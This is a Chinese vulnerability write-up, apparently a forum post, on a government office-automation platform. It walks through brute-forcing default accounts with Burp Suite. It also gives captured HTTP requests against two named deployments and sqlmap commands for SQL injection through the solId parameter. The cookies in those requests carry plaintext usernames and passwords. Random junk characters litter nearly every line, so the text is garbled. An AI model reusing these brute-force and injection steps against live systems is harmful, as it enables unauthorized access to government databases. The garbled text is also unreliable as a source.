|
& P! ]+ ?: {& X' [4 l4 ~
3 A% m4 P" O' `
5 a0 i v' ^8 e: ^) q
+ P) Q+ z5 J0 c5 \2 Y
平台简介:3 {0 G1 l6 i8 ?1 T
4 _' G. q% b# ?# a% e( F
8 d: [' J. O( c. R) A: b/ ^# L
6 R' t- ~( f5 |( W" t( Y& `
+ ]) s- P# D& f1 E1 d& w& h& k
; N/ ^% |2 ^# N; p& h4 P 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
# J9 L7 C7 k4 v$ F" E同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。 5 o- T" _ T$ v; H/ ]
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!9 c9 w) Y& l+ c$ m9 s
2 O) d6 x# k2 ]. h8 L' L9 l% C" C, d/ e- i
6 N! h) c6 m8 _( V+ m
* B4 l; x6 E1 N/ q/ m/ ?* T3 k
" {1 j. Y7 \6 n5 g; l3 G7 ^, n 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:9 s, Z) {, u4 D2 l6 u
* O1 y. K* V4 Z
( K0 S$ m# I2 [7 O3 L9 B/ F
6 R1 g! [! I/ d4 { * b) W* C1 T3 E6 B
1 O) r2 x6 l! U+ N
http://1.1.1.1:7197/cap-aco/#(案例2-)$ G* I. p o% ]
, R7 R$ y. ^8 c/ ]7 n4 K+ r( ~4 V X, L. g3 w: h9 E
http://www.XXOO.com (案例1-官网网站)
* H( _) n* X- e- ] x5 D6 R & w9 s4 R4 h! |( g+ l
/ I% y! K& P9 K# H9 A 5 H& P( O* E8 `, y; Q9 s: Q; f9 i$ c
6 Y% Z3 n7 \$ P* d6 w4 \
3 f: h+ F9 Y+ q; h5 e) q) J 漏洞详情:0 w* A/ L: S; w( X) p$ h
: Z8 E% o! F" l) n b
- E: k5 ] t; O
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
1 \5 O+ M9 w. O, t' F5 U$ r
8 H+ M" }+ h: E& x0 F: W! j% a
0 c# J' b2 }' ?, D: N 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:' E. f! y) G! z7 n+ t" R
' d& _* }+ \$ u V! n! ^, |+ F) z. a O5 ?
+ n7 L" K {$ J& k! g
& A7 B3 o, U1 S9 e6 G8 G$ V" W; v. U/ I/ T9 v# ?$ n! f# x" c
- t/ Z! a/ r5 x+ K4 B
9 M/ P: H5 @6 j! L4 E# d( I( t$ n5 j% t3 e$ M
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: q f& M* s; n
; @9 j: }0 P# O6 g8 [: p
: J1 R. v: U, P- x 1、案例1-官方网站
7 r3 L) W; ~# e
u( ?, K; C+ L/ A
! u2 I# y& X; N) b- K# F GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1! h' Z5 G1 O% h) C3 M
: Q. K) [/ A3 J- k L. ~# T
5 G, C8 j" q* R# Y+ {; l( P
Host: www.XXOO.com
0 J7 {" v* ]1 c( R8 Q& M$ {
/ }- S8 s7 ~& \% F! n
6 e7 R: b$ V4 `/ x; K Proxy-Connection: Keep-Alive; _( C+ n* |" k! ~: h/ V
g- w8 f8 ^ w7 A/ ?
; {$ U; y: d! j/ [( W1 j
Accept: application/json, text/javascript, */*; q=0.01: Z7 V& Q O( i9 I/ ~. ~
8 M ]' L4 Q5 F1 c1 r# r; y2 n1 D$ v# N
Accept-Language: zh-CN
- t( H+ f& A/ c" z/ r! u% W8 V
9 o& ?- x2 _6 \4 t
1 R( N5 H" [3 Y) n Content-Type: application/json
- T, E8 ?) E: N# F, m. Q8 d# o# j+ o% P 2 H$ H. |7 Y6 j3 i% y' [
8 ]0 V$ o& D/ j! s User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko0 U& j6 I5 A0 V- S
# X+ h @5 P% N( x4 O* Z
. I$ x/ O5 @* h8 R2 | X-Requested-With: XMLHttpRequest( i8 G& c2 [- N: t: h' s
/ O5 r2 F& }/ K9 E& A6 i# M+ }5 S4 a
. D! z3 i9 f* ?4 |1 R2 \ Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
8 u/ g. l4 M$ r1 A* j$ K8 Q 8 a1 D# T! V) H# \6 x1 q y. ^
7 E" j! z( K) z0 l$ u- g8 h
Accept-Encoding: gzip, deflate, sdch
3 C# \% S/ [9 V
* Q# t* M- }5 g" g
+ H2 L3 u) _& e3 w Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
|; E4 `" ^; j2 S
! }+ U: G% \3 Z3 I3 y
$ c$ I% `/ U# h4 O: U* c 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: V M) \! d5 p! z
( y7 ~" K* @9 m7 v3 \
% a9 L2 P; Y8 @0 x5 _" P6 x
8 g- X; O+ o+ p3 K; A* ?1 J' l
% {) `+ D3 z* N; c
$ u0 J L* _& s ~% N3 a 4 b; I8 k: F ~/ E5 R5 C' B
6 k0 N" x( Z/ W6 e9 G9 ]4 u/ t7 J5 Z* R# k" u" ~6 A/ \2 \* a
) @: }' _7 I( y) K4 S, n4 E
& ?" j# x& r7 s6 w4 q/ O+ j! E
0 O n! S4 K/ y! M, Q1 [0 }& J
8 A$ J$ D* Q. Z( H; D, M 2 S( i/ n) j; [6 R1 P8 d% D& B
& w% D6 a( c, e2 X
7 R6 K5 x. @% k# n# W- @
& d" G; R, o) V e$ F% L+ _8 o
+ \2 V ~" e6 H' p, g7 ~. b+ c- o 2、案例2-某天河云平台) v ]$ |8 J$ | U, S8 Z+ u
7 m; c5 f: `; c- X) |( [6 ?2 s! B1 H% ^6 n. m+ o- |- k% |
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
, B8 @& _* w8 Y9 U0 w( T0 @8 U; _ " B. n$ r4 f. `7 T. ~& A6 u
; ~1 P% W' A$ I Host: 1.1.1.:7197
: M- e. ^. h( i
4 m, |3 @4 K7 E" U1 X% e. `) {% s* K5 K0 Q& V; B
Accept: application/json, text/javascript, */*; q=0.01
i6 Z9 T; f5 I+ R( F, {) E 1 d0 a, t6 R: D6 G9 M+ B( Q7 b" e
) _6 J: x+ l3 Y! ` X-Requested-With: XMLHttpRequest1 t4 R$ `, r% P1 S+ K
, N& r$ l e9 k) Q; S- w9 J# Q! t$ Z/ R
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
3 ~; O, x0 C' A9 `. x8 q7 u 1 d3 H2 I: v3 \* k
' t! b# c% ?3 T \2 t$ ^" z
Content-Type: application/json
: ~" b6 o8 t$ X 0 a) W+ N" R' G. l- ]5 B
* ?2 V1 ?: S6 S( Z8 i/ g Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008* Y7 f, O6 E0 u
; m8 _# Y9 W6 C
/ H$ P" }8 x/ E1 m Accept-Language: zh-CN,zh;q=0.8
& W7 o" _$ Q7 X) z3 \ + u0 D1 o, X3 f' L
8 W" }, v1 L7 R Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
b( S& N# |& Q4 l p8 ^. g
' e- c4 ~) ?% `& O7 s7 v; S$ p+ z0 o1 }
Connection: close }4 B( u( _9 j& a" K, }
0 i) u5 A- j1 E1 l$ k/ L/ A
" a7 r" y3 {* s 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:$ F. v4 k1 {0 ]7 V) _5 n4 G, ^
- k8 g' F1 p* I# Y7 r
7 r1 \1 m, A3 r L7 l; U
' |: t" H4 V. b* D: W- U i
1 b. @0 x8 R1 n% G# L5 d* S! J1 t$ x$ i3 [
6 A: g3 v& i& i, H |